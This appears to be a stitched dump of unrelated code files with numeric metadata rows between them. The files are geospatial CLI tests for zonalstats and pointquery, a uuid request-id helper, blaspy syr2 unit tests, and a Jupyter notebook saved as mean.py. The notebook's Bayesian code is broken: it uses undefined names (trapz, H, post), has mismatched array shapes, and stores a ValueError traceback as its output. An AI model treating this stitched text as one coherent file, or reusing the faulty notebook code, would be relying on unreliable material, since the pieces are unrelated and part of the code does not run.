    """zonalstats on a single-feature GeoJSON file passed as an argument:
    the mean stat is added under the 'test_' prefix and no other stats leak in."""
    raster = os.path.join(os.path.dirname(__file__), 'data/slope.tif')
    vector = os.path.join(os.path.dirname(__file__), 'data/feature.geojson')
    runner = CliRunner()
    warnings.simplefilter('ignore')
    result = runner.invoke(zonalstats, [vector,
                                        '--raster', raster,
                                        '--stats', 'mean',
                                        '--prefix', 'test_'])
    assert result.exit_code == 0
    outdata = json.loads(result.output)
    assert len(outdata['features']) == 1
    feature = outdata['features'][0]
    assert 'test_mean' in feature['properties']
    assert round(feature['properties']['test_mean'], 2) == 14.66
    assert 'test_count' not in feature['properties']
def test_cli_feature_stdin():
    """zonalstats reads the vector from stdin when no path argument is given."""
    raster = os.path.join(os.path.dirname(__file__), 'data/slope.tif')
    vector = os.path.join(os.path.dirname(__file__), 'data/feature.geojson')
    runner = CliRunner()
    warnings.simplefilter('ignore')
    result = runner.invoke(zonalstats,
                           ['--raster', raster,
                            '--stats', 'mean',
                            '--prefix', 'test_'],
                           input=open(vector, 'r').read())
    assert result.exit_code == 0
    outdata = json.loads(result.output)
    assert len(outdata['features']) == 1
    feature = outdata['features'][0]
    assert 'test_mean' in feature['properties']
def test_cli_features_sequence():
    """--sequence makes zonalstats emit one GeoJSON Feature per output line
    instead of a single FeatureCollection."""
    raster = os.path.join(os.path.dirname(__file__), 'data/slope.tif')
    vector = os.path.join(os.path.dirname(__file__), 'data/featurecollection.geojson')
    runner = CliRunner()
    result = runner.invoke(zonalstats, [vector,
                                        '--raster', raster,
                                        '--stats', 'mean',
                                        '--prefix', 'test_',
                                        '--sequence'])
    assert result.exit_code == 0
    results = result.output.splitlines()
    for r in results:
        outdata = json.loads(r)
        assert outdata['type'] == 'Feature'
def test_cli_features_sequence_rs():
    """--sequence --rs prefixes each record with the ASCII RS (0x1e)
    record separator (RFC 7464 json-seq style output)."""
    raster = os.path.join(os.path.dirname(__file__), 'data/slope.tif')
    vector = os.path.join(os.path.dirname(__file__), 'data/featurecollection.geojson')
    runner = CliRunner()
    result = runner.invoke(zonalstats, [vector,
                                        '--raster', raster,
                                        '--stats', 'mean',
                                        '--prefix', 'test_',
                                        '--sequence', '--rs'])
    assert result.exit_code == 0
    # CliRunner output is text, so compare against the str form of RS.
    assert result.output[0] == '\x1e'
def test_cli_featurecollection():
    """zonalstats on a two-feature FeatureCollection: stats are attached to
    every feature, checked here on the first one."""
    raster = os.path.join(os.path.dirname(__file__), 'data/slope.tif')
    vector = os.path.join(os.path.dirname(__file__), 'data/featurecollection.geojson')
    runner = CliRunner()
    result = runner.invoke(zonalstats, [vector,
                                        '--raster', raster,
                                        '--stats', 'mean',
                                        '--prefix', 'test_'])
    assert result.exit_code == 0
    outdata = json.loads(result.output)
    assert len(outdata['features']) == 2
    feature = outdata['features'][0]
    assert 'test_mean' in feature['properties']
    assert round(feature['properties']['test_mean'], 2) == 14.66
    assert 'test_count' not in feature['properties']
def test_cli_pointquery():
    """pointquery adds the sampled raster value under --property-name."""
    raster = os.path.join(os.path.dirname(__file__), 'data/slope.tif')
    vector = os.path.join(os.path.dirname(__file__), 'data/featurecollection.geojson')
    runner = CliRunner()
    result = runner.invoke(pointquery, [vector,
                                        '--raster', raster,
                                        '--property-name', 'slope'])
    assert result.exit_code == 0
    outdata = json.loads(result.output)
    assert len(outdata['features']) == 2
    feature = outdata['features'][0]
    assert 'slope' in feature['properties']
def test_cli_point_sequence():
    """pointquery --sequence emits one GeoJSON Feature per output line."""
    raster = os.path.join(os.path.dirname(__file__), 'data/slope.tif')
    vector = os.path.join(os.path.dirname(__file__), 'data/featurecollection.geojson')
    runner = CliRunner()
    result = runner.invoke(pointquery, [vector,
                                        '--raster', raster,
                                        '--property-name', 'slope',
                                        '--sequence'])
    assert result.exit_code == 0
    results = result.output.splitlines()
    for r in results:
        outdata = json.loads(r)
        assert outdata['type'] == 'Feature'
def test_cli_point_sequence_rs():
    """pointquery --sequence --rs prefixes output with the RS (0x1e)
    record separator."""
    raster = os.path.join(os.path.dirname(__file__), 'data/slope.tif')
    vector = os.path.join(os.path.dirname(__file__), 'data/featurecollection.geojson')
    runner = CliRunner()
    result = runner.invoke(pointquery, [vector,
                                        '--raster', raster,
                                        '--property-name', 'slope',
                                        '--sequence', '--rs'])
    assert result.exit_code == 0
    assert result.output[0] == '\x1e'
| 41.840909
| 86
| 0.556038
| 567
| 5,523
| 5.227513
| 0.148148
| 0.066802
| 0.053981
| 0.064777
| 0.892713
| 0.875169
| 0.851552
| 0.851552
| 0.851552
| 0.851552
| 0
| 0.011178
| 0.303458
| 5,523
| 131
| 87
| 42.160305
| 0.759293
| 0.029151
| 0
| 0.828829
| 0
| 0
| 0.164458
| 0.033601
| 0
| 0
| 0
| 0
| 0.216216
| 1
| 0.072072
| false
| 0
| 0.045045
| 0
| 0.117117
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
d342a9a652780d1332127bfb50063565e5a000be
| 70
|
py
|
Python
|
flask_logger_decorator/utils.py
|
sunwei/flask-logger-decorator
|
080d412db3dbdc2a4d34fe1d31605fbcb0d31992
|
[
"MIT"
] | 1
|
2020-04-16T03:51:56.000Z
|
2020-04-16T03:51:56.000Z
|
flask_logger_decorator/utils.py
|
sunwei/flask-logger-decorator
|
080d412db3dbdc2a4d34fe1d31605fbcb0d31992
|
[
"MIT"
] | null | null | null |
flask_logger_decorator/utils.py
|
sunwei/flask-logger-decorator
|
080d412db3dbdc2a4d34fe1d31605fbcb0d31992
|
[
"MIT"
] | null | null | null |
import uuid
def generate_request_id():
    """Return a fresh, random request identifier.

    The identifier is a version-4 UUID rendered in its canonical
    36-character hyphenated string form.
    """
    return "{}".format(uuid.uuid4())
| 11.666667
| 28
| 0.714286
| 10
| 70
| 4.8
| 0.9
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.017241
| 0.171429
| 70
| 5
| 29
| 14
| 0.810345
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| true
| 0
| 0.333333
| 0.333333
| 1
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 1
| 1
| 0
| 0
|
0
| 7
|
d35ed3700088ef2326c911c67af2cb0243299bb3
| 15,228
|
py
|
Python
|
bp_unit_tests/level_2/unit_test_syr2.py
|
nicholas-moreles/blaspy
|
c4af6258e17dd996c4b6d90bbaae15b31b8702b4
|
[
"BSD-3-Clause"
] | 4
|
2015-01-25T12:44:44.000Z
|
2022-03-19T08:36:19.000Z
|
bp_unit_tests/level_2/unit_test_syr2.py
|
nicholas-moreles/blaspy
|
c4af6258e17dd996c4b6d90bbaae15b31b8702b4
|
[
"BSD-3-Clause"
] | 7
|
2015-01-20T13:35:39.000Z
|
2015-05-31T17:11:50.000Z
|
bp_unit_tests/level_2/unit_test_syr2.py
|
nicholas-moreles/blaspy
|
c4af6258e17dd996c4b6d90bbaae15b31b8702b4
|
[
"BSD-3-Clause"
] | null | null | null |
"""
Copyright (c) 2014-2015, The University of Texas at Austin.
All rights reserved.
This file is part of BLASpy and is available under the 3-Clause
BSD License, which can be found in the LICENSE file at the top-level
directory or at http://opensource.org/licenses/BSD-3-Clause
"""
from blaspy import syr2
from numpy import array, asmatrix
from string import ascii_letters
from unittest import TestCase
class TestSyr2(TestCase):
def test_scalars_as_ndarray_provide_A(self):
A = array([[1.]])
x = array([[2.]])
y = array([[3.]])
self.assertEqual(syr2(x, y, A), 13)
self.assertEqual(A, 13)
def test_scalars_as_ndarray_no_A(self):
x = array([[2.]])
y = array([[3.]])
self.assertEqual(syr2(x, y), 12)
def test_row_row_as_ndarray_provide_A(self):
A = array([[1., 2.],
[2., 3.]])
x = array([[1., 2.]])
y = array([[3., 4.]])
expected = [[7., 12.],
[2., 19.]]
self.assertListEqual(syr2(x, y, A).tolist(), expected)
self.assertListEqual(A.tolist(), expected)
def test_row_row_as_ndarray_no_A(self):
x = array([[1., 2.]])
y = array([[3., 4.]])
expected = [[6., 10.],
[0., 16.]]
self.assertListEqual(syr2(x, y).tolist(), expected)
def test_matrix_row_col_as_ndarray_provide_A(self):
A = array([[1., 2.],
[2., 3.]])
x = array([[1., 2.]])
y = array([[3.],
[4.]])
expected = [[7., 12.],
[2., 19.]]
self.assertListEqual(syr2(x, y, A).tolist(), expected)
self.assertListEqual(A.tolist(), expected)
def test_matrix_col_row_as_ndarray_provide_A(self):
A = array([[1., 2.],
[2., 3.]])
x = array([[1.],
[2.]])
y = array([[3., 4.]])
expected = [[7., 12.],
[2., 19.]]
self.assertListEqual(syr2(x, y, A).tolist(), expected)
self.assertListEqual(A.tolist(), expected)
def test_matrix_col_col_as_ndarray_provide_y(self):
A = array([[1., 2.],
[2., 3.]])
x = array([[1.],
[2.]])
y = array([[3.],
[4.]])
expected = [[7., 12.],
[2., 19.]]
self.assertListEqual(syr2(x, y, A).tolist(), expected)
self.assertListEqual(A.tolist(), expected)
def test_matrix_col_col_as_ndarray_no_A(self):
x = array([[1.],
[2.]])
y = array([[3.],
[4.]])
expected = [[6., 10.],
[0., 16.]]
self.assertListEqual(syr2(x, y).tolist(), expected)
def test_lower_triangle_ignored_with_uplo_u(self):
A = array([[1., 2.],
[-100., 3.]])
x = array([[1.],
[2.]])
y = array([[3.],
[4.]])
expected = [[7., 12.],
[-100., 19.]]
self.assertListEqual(syr2(x, y, A, uplo='u').tolist(), expected)
self.assertListEqual(A.tolist(), expected)
def test_lower_triangle_ignored_with_uplo_U(self):
A = array([[1., 2.],
[-100., 3.]])
x = array([[1.],
[2.]])
y = array([[3.],
[4.]])
expected = [[7., 12.],
[-100., 19.]]
self.assertListEqual(syr2(x, y, A, uplo='U').tolist(), expected)
self.assertListEqual(A.tolist(), expected)
def test_upper_triangle_ignored_with_uplo_l(self):
A = array([[1., 55.],
[2., 3.]])
x = array([[1.],
[2.]])
y = array([[3.],
[4.]])
expected = [[7., 55.],
[12., 19.]]
self.assertListEqual(syr2(x, y, A, uplo='l').tolist(), expected)
self.assertListEqual(A.tolist(), expected)
def test_upper_triangle_ignored_with_uplo_L(self):
A = array([[1., 55.],
[2., 3.]])
x = array([[1.],
[2.]])
y = array([[3.],
[4.]])
expected = [[7., 55.],
[12., 19.]]
self.assertListEqual(syr2(x, y, A, uplo='L').tolist(), expected)
self.assertListEqual(A.tolist(), expected)
def test_alpha(self):
A = array([[1., 2.],
[2., 3.]])
x = array([[1.],
[2.]])
y = array([[3.],
[4.]])
alpha = 2.5
expected = [[16., 27.],
[2., 43.]]
self.assertListEqual(syr2(x, y, A, alpha=alpha).tolist(), expected)
self.assertListEqual(A.tolist(), expected)
def test_as_matrix_mixed_no_A(self):
x = asmatrix(array([[1.],
[2.]]))
y = array([[3.],
[4.]])
expected = [[6., 10.],
[0., 16.]]
self.assertListEqual(syr2(x, y).tolist(), expected)
def test_strides_less_than_length_provide_A(self):
A = array([[1., 2.],
[2., 3.]])
x = array([[1.],
[2.],
[3.],
[4.]])
y = array([[3.],
[4.],
[5.],
[6.]])
expected = [[7., 16.],
[2., 33.]]
self.assertListEqual(syr2(x, y, A, inc_x=2, inc_y=2).tolist(), expected)
self.assertListEqual(A.tolist(), expected)
def test_strides_less_than_length_no_A(self):
x = array([[1.],
[2.],
[3.],
[4.]])
y = array([[3.],
[4.],
[5.],
[6.]])
expected = [[6., 14.],
[0., 30.]]
self.assertListEqual(syr2(x, y, inc_x=2, inc_y=2).tolist(), expected)
def test_strides_greater_than_length_provide_A(self):
A = array([[3.]])
x = array([[1.],
[2.],
[3.],
[4.]])
y = array([[3.],
[4.],
[5.],
[6.]])
expected = [[9.]]
self.assertListEqual(syr2(x, y, A, inc_x=4, inc_y=4).tolist(), expected)
self.assertListEqual(A.tolist(), expected)
def test_unequal_strides(self):
A = array([[1., 2.],
[2., 3.]])
x = array([[1.],
[2.],
[3.],
[4.]])
y = array([[3.],
[5.]])
expected = [[7., 16.],
[2., 33.]]
self.assertListEqual(syr2(x, y, A, inc_x=2, inc_y=1).tolist(), expected)
self.assertListEqual(A.tolist(), expected)
def test_float32_dtype(self):
A = array([[1., 2.],
[2., 3.]], dtype='float32')
x = array([[1.],
[2.]], dtype='float32')
y = array([[3.],
[4.]], dtype='float32')
self.assertEqual(A.dtype, 'float32')
self.assertEqual(x.dtype, 'float32')
self.assertEqual(y.dtype, 'float32')
expected = [[7., 12.],
[2., 19.]]
self.assertListEqual(syr2(x, y, A).tolist(), expected)
self.assertListEqual(A.tolist(), expected)
def test_float64_dtype(self):
A = array([[1., 2.],
[2., 3.]], dtype='float64')
x = array([[1.],
[2.]], dtype='float64')
y = array([[3.],
[4.]], dtype='float64')
self.assertEqual(A.dtype, 'float64')
self.assertEqual(x.dtype, 'float64')
self.assertEqual(y.dtype, 'float64')
expected = [[7., 12.],
[2., 19.]]
self.assertListEqual(syr2(x, y, A).tolist(), expected)
self.assertListEqual(A.tolist(), expected)
def test_not_numpy_with_list_for_A_raises_ValueError(self):
A = [[1., 2.],
[3., 4.]]
x = array([[1.],
[2.]])
y = array([[3.],
[4.]])
self.assertRaises(ValueError, syr2, x, y, A)
def test_not_numpy_with_list_for_x_raises_ValueError(self):
A = array([[1., 2.],
[3., 4.]])
x = [[1.],
[2.]]
y = array([[3.],
[4.]])
self.assertRaises(ValueError, syr2, x, y, A)
def test_not_numpy_with_list_for_y_raises_ValueError(self):
A = array([[1., 2.],
[3., 4.]])
x = array([[1.],
[2.]])
y = [[3.],
[4.]]
self.assertRaises(ValueError, syr2, x, y, A)
def test_not_numpy_with_scalar_for_A_raises_ValueError(self):
A = 1.
x = array([[1.]])
y = array([[3.]])
self.assertRaises(ValueError, syr2, x, y, A)
def test_not_numpy_with_scalar_for_x_raises_ValueError(self):
A = array([[1.]])
x = 1.
y = array([[3.]])
self.assertRaises(ValueError, syr2, x, y, A)
def test_not_numpy_with_scalar_for_y_raises_ValueError(self):
A = array([[1.]])
x = array([[1.]])
y = 3.
self.assertRaises(ValueError, syr2, x, y, A)
def test_not_2d_numpy_with_1d_for_A_raises_ValueError(self):
A = array([1., 2., 2., 1.])
x = array([[1.],
[2.]])
y = array([[3.],
[4.]])
self.assertRaises(ValueError, syr2, x, y, A)
def test_not_2d_numpy_with_1d_for_x_raises_ValueError(self):
A = array([[1., 2.],
[3., 4.]])
x = array([1., 2.])
y = array([[3., 4.]])
self.assertRaises(ValueError, syr2, x, y, A)
def test_not_2d_numpy_with_1d_for_y_raises_ValueError(self):
A = array([[1., 2.],
[3., 4.]])
x = array([[1., 2.]])
y = array([3., 4.])
self.assertRaises(ValueError, syr2, x, y, A)
def test_not_2d_numpy_with_3d_for_A_raises_ValueError(self):
A = array([[[1., 2.],
[2., 3.]]], ndmin=3)
x = array([[1.],
[2.]])
y = array([[3.]])
self.assertRaises(ValueError, syr2, x, y, A)
def test_not_2d_numpy_with_3d_for_x_raises_ValueError(self):
A = array([[1., 2.],
[2., 3.]])
x = array([[[1., 2.]]], ndmin=3)
y = array([[3., 4.]])
self.assertRaises(ValueError, syr2, x, y, A)
def test_not_2d_numpy_with_3d_for_y_raises_ValueError(self):
A = array([[1., 2.],
[2., 3.]])
x = array([[1., 2.]])
y = array([[[3., 4.]]], ndmin=3)
self.assertRaises(ValueError, syr2, x, y, A)
def test_nonconforming_x_raises_ValueError(self):
A = array([[1., 2.],
[2., 3.]])
x = array([[1.],
[2.],
[3.]])
y = array([[3.],
[4.]])
self.assertRaises(ValueError, syr2, x, y, A)
def test_nonconforming_y_raises_ValueError(self):
A = array([[1., 2.],
[2., 3.]])
x = array([[1.],
[2.]])
y = array([[3.]])
self.assertRaises(ValueError, syr2, x, y, A)
def test_non_square_A_raises_ValueError(self):
A = array([[1., 2., 3.],
[2., 3., 4.]])
x = array([[1.],
[2.],
[3.]])
y = array([[3.],
[4.]])
self.assertRaises(ValueError, syr2, x, y, A)
def test_nonconforming_x_with_strides_raises_ValueError(self):
A = array([[1., 2.],
[2., 3.]])
x = array([[1.],
[2.]])
y = array([[3.],
[4.]])
self.assertRaises(ValueError, syr2, x, y, A, 'u', 1., None, 2)
def test_nonconforming_y_with_strides_raises_ValueError(self):
A = array([[1., 2.],
[2., 3.]])
x = array([[1.],
[2.]])
y = array([[3.],
[4.]])
self.assertRaises(ValueError, syr2, x, y, A, 'u', 1., None, 1, 2)
def test_not_vector_raises_ValueError(self):
A = array([[1., 2.],
[2., 3.]])
x = array([[1., 2.],
[2., 3.]])
y = array([[1., 2.],
[2., 3.]])
self.assertRaises(ValueError, syr2, x, y, A)
def test_mixed_dtypes_A_raises_ValueError(self):
A = array([[1., 2.],
[3., 4.]], dtype='float32')
x = array([[1.],
[2.]], dtype='float64')
y = array([[3.],
[4.]], dtype='float64')
self.assertEqual(A.dtype, 'float32')
self.assertEqual(x.dtype, 'float64')
self.assertEqual(y.dtype, 'float64')
self.assertRaises(ValueError, syr2, x, y, A)
def test_mixed_dtypes_x_raises_ValueError(self):
A = array([[1., 2.],
[3., 4.]], dtype='float64')
x = array([[1.],
[2.]], dtype='float32')
y = array([[3.],
[4.]], dtype='float64')
self.assertEqual(A.dtype, 'float64')
self.assertEqual(x.dtype, 'float32')
self.assertEqual(y.dtype, 'float64')
self.assertRaises(ValueError, syr2, x, y, A)
def test_mixed_dtypes_y_raises_ValueError(self):
A = array([[1., 2.],
[3., 4.]], dtype='float64')
x = array([[1.],
[2.]], dtype='float64')
y = array([[3.],
[4.]], dtype='float32')
self.assertEqual(A.dtype, 'float64')
self.assertEqual(x.dtype, 'float64')
self.assertEqual(y.dtype, 'float32')
self.assertRaises(ValueError, syr2, x, y, A)
def test_integer_dtype_for_all_raises_ValueError(self):
A = array([[1., 2.],
[3., 4.]], dtype='int')
x = array([[1.],
[2.]], dtype='int')
y = array([[3.],
[4.]], dtype='int')
self.assertEqual(A.dtype, 'int')
self.assertEqual(x.dtype, 'int')
self.assertEqual(y.dtype, 'int')
self.assertRaises(ValueError, syr2, x, y, A)
def test_complex_dtype_for_all_raises_ValueError(self):
A = array([[1., 2.],
[3., 4.]], dtype='complex')
x = array([[1.],
[2.]], dtype='complex')
y = array([[3.],
[4.]], dtype='complex')
self.assertEqual(A.dtype, 'complex')
self.assertEqual(x.dtype, 'complex')
self.assertEqual(y.dtype, 'complex')
self.assertRaises(ValueError, syr2, x, y, A)
def test_invalid_values_for_uplo_raises_ValueError(self):
    """Every ASCII letter except u/U/l/L is an invalid uplo flag."""
    mat = array([[1., 2.], [3., 4.]])
    vec_x = array([[1.], [2.]])
    vec_y = array([[3.], [4.]])
    for letter in ascii_letters:
        if letter in 'uUlL':
            continue
        self.assertRaises(ValueError, syr2, vec_x, vec_y, mat, letter)
| 31.725
| 80
| 0.441095
| 1,742
| 15,228
| 3.696326
| 0.076349
| 0.07175
| 0.076099
| 0.042398
| 0.872962
| 0.848579
| 0.84128
| 0.815344
| 0.787234
| 0.711912
| 0
| 0.0629
| 0.374639
| 15,228
| 480
| 81
| 31.725
| 0.613252
| 0.017993
| 0
| 0.725926
| 0
| 0
| 0.01876
| 0
| 0
| 0
| 0
| 0
| 0.197531
| 1
| 0.108642
| false
| 0
| 0.009877
| 0
| 0.120988
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
d37bc5d551d90e8e56e0fc80956d0f83e55b33dc
| 7,742
|
py
|
Python
|
mean.py
|
jpacuna99/AcunaJuan_ejercicio06
|
0de50eb3558b4dbf1d5664f667201d37a1957741
|
[
"MIT"
] | null | null | null |
mean.py
|
jpacuna99/AcunaJuan_ejercicio06
|
0de50eb3558b4dbf1d5664f667201d37a1957741
|
[
"MIT"
] | null | null | null |
mean.py
|
jpacuna99/AcunaJuan_ejercicio06
|
0de50eb3558b4dbf1d5664f667201d37a1957741
|
[
"MIT"
] | null | null | null |
{
"cells": [
{
"cell_type": "code",
"execution_count": 13,
"metadata": {},
"outputs": [
{
"ename": "ValueError",
"evalue": "operands could not be broadcast together with shapes (4,) (100,) (4,) ",
"output_type": "error",
"traceback": [
"\u001b[0;31m---------------------------------------------------------------------------\u001b[0m",
"\u001b[0;31mValueError\u001b[0m Traceback (most recent call last)",
"\u001b[0;32m<ipython-input-13-5f28594dbd6a>\u001b[0m in \u001b[0;36m<module>\u001b[0;34m\u001b[0m\n\u001b[1;32m 38\u001b[0m \u001b[0;34m\u001b[0m\u001b[0m\n\u001b[1;32m 39\u001b[0m \u001b[0;34m\u001b[0m\u001b[0m\n\u001b[0;32m---> 40\u001b[0;31m \u001b[0mmaximo\u001b[0m\u001b[0;34m,\u001b[0m \u001b[0msigma\u001b[0m \u001b[0;34m=\u001b[0m \u001b[0mmaximo_sigma\u001b[0m\u001b[0;34m(\u001b[0m\u001b[0mprior\u001b[0m\u001b[0;34m(\u001b[0m\u001b[0mx\u001b[0m\u001b[0;34m)\u001b[0m\u001b[0;34m,\u001b[0m \u001b[0mposterior\u001b[0m\u001b[0;34m(\u001b[0m\u001b[0mmu\u001b[0m\u001b[0;34m,\u001b[0m\u001b[0mx\u001b[0m\u001b[0;34m)\u001b[0m\u001b[0;34m)\u001b[0m\u001b[0;34m\u001b[0m\u001b[0;34m\u001b[0m\u001b[0m\n\u001b[0m\u001b[1;32m 41\u001b[0m \u001b[0;34m\u001b[0m\u001b[0m\n\u001b[1;32m 42\u001b[0m \u001b[0;34m\u001b[0m\u001b[0m\n",
"\u001b[0;32m<ipython-input-13-5f28594dbd6a>\u001b[0m in \u001b[0;36mposterior\u001b[0;34m(H, secuencia)\u001b[0m\n\u001b[1;32m 21\u001b[0m \u001b[0mPosterior\u001b[0m \u001b[0mcalculado\u001b[0m \u001b[0mcon\u001b[0m \u001b[0mla\u001b[0m \u001b[0mnormalizacion\u001b[0m \u001b[0madecuada\u001b[0m\u001b[0;34m\u001b[0m\u001b[0;34m\u001b[0m\u001b[0m\n\u001b[1;32m 22\u001b[0m \"\"\"\n\u001b[0;32m---> 23\u001b[0;31m \u001b[0mpost\u001b[0m \u001b[0;34m=\u001b[0m \u001b[0mlike\u001b[0m\u001b[0;34m(\u001b[0m\u001b[0mx\u001b[0m\u001b[0;34m,\u001b[0m \u001b[0msigma\u001b[0m\u001b[0;34m,\u001b[0m\u001b[0mmu\u001b[0m\u001b[0;34m)\u001b[0m \u001b[0;34m+\u001b[0m \u001b[0mnp\u001b[0m\u001b[0;34m.\u001b[0m\u001b[0mlog\u001b[0m\u001b[0;34m(\u001b[0m\u001b[0mprior\u001b[0m\u001b[0;34m(\u001b[0m\u001b[0mmu\u001b[0m\u001b[0;34m)\u001b[0m\u001b[0;34m)\u001b[0m\u001b[0;34m\u001b[0m\u001b[0;34m\u001b[0m\u001b[0m\n\u001b[0m\u001b[1;32m 24\u001b[0m \u001b[0mevidencia\u001b[0m \u001b[0;34m=\u001b[0m \u001b[0mnp\u001b[0m\u001b[0;34m.\u001b[0m\u001b[0mamax\u001b[0m\u001b[0;34m(\u001b[0m\u001b[0mpost\u001b[0m\u001b[0;34m)\u001b[0m\u001b[0;34m\u001b[0m\u001b[0;34m\u001b[0m\u001b[0m\n\u001b[1;32m 25\u001b[0m \u001b[0;32mreturn\u001b[0m \u001b[0mnp\u001b[0m\u001b[0;34m.\u001b[0m\u001b[0mexp\u001b[0m\u001b[0;34m(\u001b[0m\u001b[0mpost\u001b[0m\u001b[0;34m-\u001b[0m\u001b[0mevidencia\u001b[0m\u001b[0;34m)\u001b[0m\u001b[0;34m/\u001b[0m\u001b[0mtrapz\u001b[0m\u001b[0;34m(\u001b[0m\u001b[0mnp\u001b[0m\u001b[0;34m.\u001b[0m\u001b[0mexp\u001b[0m\u001b[0;34m(\u001b[0m\u001b[0mpost\u001b[0m\u001b[0;34m-\u001b[0m\u001b[0mevidencia\u001b[0m\u001b[0;34m)\u001b[0m\u001b[0;34m,\u001b[0m\u001b[0mmu\u001b[0m\u001b[0;34m)\u001b[0m\u001b[0;34m\u001b[0m\u001b[0;34m\u001b[0m\u001b[0m\n",
"\u001b[0;32m<ipython-input-13-5f28594dbd6a>\u001b[0m in \u001b[0;36mlike\u001b[0;34m(secuencia, sigma, mu)\u001b[0m\n\u001b[1;32m 14\u001b[0m \u001b[0mL\u001b[0m\u001b[0;34m=\u001b[0m\u001b[0mnp\u001b[0m\u001b[0;34m.\u001b[0m\u001b[0mzeros\u001b[0m\u001b[0;34m(\u001b[0m\u001b[0mlen\u001b[0m\u001b[0;34m(\u001b[0m\u001b[0mx\u001b[0m\u001b[0;34m)\u001b[0m\u001b[0;34m)\u001b[0m\u001b[0;34m\u001b[0m\u001b[0;34m\u001b[0m\u001b[0m\n\u001b[1;32m 15\u001b[0m \u001b[0;32mfor\u001b[0m \u001b[0mi\u001b[0m \u001b[0;32min\u001b[0m \u001b[0mrange\u001b[0m\u001b[0;34m(\u001b[0m\u001b[0mlen\u001b[0m\u001b[0;34m(\u001b[0m\u001b[0mx\u001b[0m\u001b[0;34m)\u001b[0m\u001b[0;34m)\u001b[0m\u001b[0;34m:\u001b[0m\u001b[0;34m\u001b[0m\u001b[0;34m\u001b[0m\u001b[0m\n\u001b[0;32m---> 16\u001b[0;31m \u001b[0mL\u001b[0m \u001b[0;34m+=\u001b[0m \u001b[0mnp\u001b[0m\u001b[0;34m.\u001b[0m\u001b[0mlog\u001b[0m\u001b[0;34m(\u001b[0m\u001b[0;36m1.\u001b[0m\u001b[0;34m/\u001b[0m\u001b[0mnp\u001b[0m\u001b[0;34m.\u001b[0m\u001b[0msqrt\u001b[0m\u001b[0;34m(\u001b[0m\u001b[0;36m2.0\u001b[0m\u001b[0;34m*\u001b[0m\u001b[0mnp\u001b[0m\u001b[0;34m.\u001b[0m\u001b[0mpi\u001b[0m\u001b[0;34m*\u001b[0m\u001b[0msigma\u001b[0m\u001b[0;34m[\u001b[0m\u001b[0mi\u001b[0m\u001b[0;34m]\u001b[0m\u001b[0;34m**\u001b[0m\u001b[0;36m2\u001b[0m\u001b[0;34m)\u001b[0m\u001b[0;34m)\u001b[0m\u001b[0;34m*\u001b[0m\u001b[0mnp\u001b[0m\u001b[0;34m.\u001b[0m\u001b[0mexp\u001b[0m\u001b[0;34m(\u001b[0m\u001b[0;34m-\u001b[0m\u001b[0;36m0.5\u001b[0m\u001b[0;34m*\u001b[0m\u001b[0;34m(\u001b[0m\u001b[0msecuencia\u001b[0m\u001b[0;34m[\u001b[0m\u001b[0mi\u001b[0m\u001b[0;34m]\u001b[0m\u001b[0;34m-\u001b[0m\u001b[0mmu\u001b[0m\u001b[0;34m)\u001b[0m\u001b[0;34m**\u001b[0m\u001b[0;36m2\u001b[0m\u001b[0;34m/\u001b[0m\u001b[0;34m(\u001b[0m\u001b[0msigma\u001b[0m\u001b[0;34m[\u001b[0m\u001b[0mi\u001b[0m\u001b[0;34m]\u001b[0m\u001b[0;34m**\u001b[0m\u001b[0;36m2\u001b[0m\u001b[0;34m)\u001b[0m\u001b[0;34m)\u001b[0m\u001b[0;34m\u001b[0m\u001b[0;34m\u001
b[0m\u001b[0m\n\u001b[0m\u001b[1;32m 17\u001b[0m \u001b[0;32mreturn\u001b[0m \u001b[0mL\u001b[0m\u001b[0;34m\u001b[0m\u001b[0;34m\u001b[0m\u001b[0m\n\u001b[1;32m 18\u001b[0m \u001b[0;34m\u001b[0m\u001b[0m\n",
"\u001b[0;31mValueError\u001b[0m: operands could not be broadcast together with shapes (4,) (100,) (4,) "
]
}
],
"source": [
"\n",
"import numpy as np\n",
"import matplotlib.pyplot as plt\n",
"x =[4.6, 6.0, 2.0, 5.8] \n",
"x=np.array(x)\n",
"sigma =[2.0, 1.5, 5.0, 1.0]\n",
    "mu=np.linspace(10,-10,100)\n",
"\n",
"def prior(a):\n",
" p=np.ones(len(a))\n",
" return p\n",
"\n",
"def like(secuencia, sigma,mu):\n",
" L=np.zeros(len(x))\n",
" for i in range(len(x)):\n",
" L += np.log(1./np.sqrt(2.0*np.pi*sigma[i]**2))*np.exp(-0.5*(secuencia[i]-mu)**2/(sigma[i]**2))\n",
" return L\n",
"\n",
"def posterior(H, secuencia):\n",
" \"\"\"\n",
" Posterior calculado con la normalizacion adecuada\n",
" \"\"\"\n",
" post = like(x, sigma,mu) + np.log(prior(mu))\n",
" evidencia = np.amax(post)\n",
" return np.exp(post-evidencia)/trapz(np.exp(post-evidencia),mu)\n",
" \n",
"\n",
"def maximo_sigma(x, y):\n",
" deltax = x[1] - x[0]\n",
"\n",
" ii = np.argmax(y)\n",
"\n",
" # segunda derivada\n",
" d = (y[ii+1] - 2*y[ii] + y[ii-1]) / (deltax**2)\n",
"\n",
" return x[ii], 1.0/np.sqrt(-d)\n",
" \n",
"\n",
"\n",
"maximo, sigma = maximo_sigma(prior(x), posterior(mu,x))\n",
"\n",
"\n",
"\n",
"plt.figure()\n",
"plt.plot(H, post, label='datos={}'.format(secuencia))\n",
"plt.plot(H, gauss, ':', label='Aproximacion Gaussiana')\n",
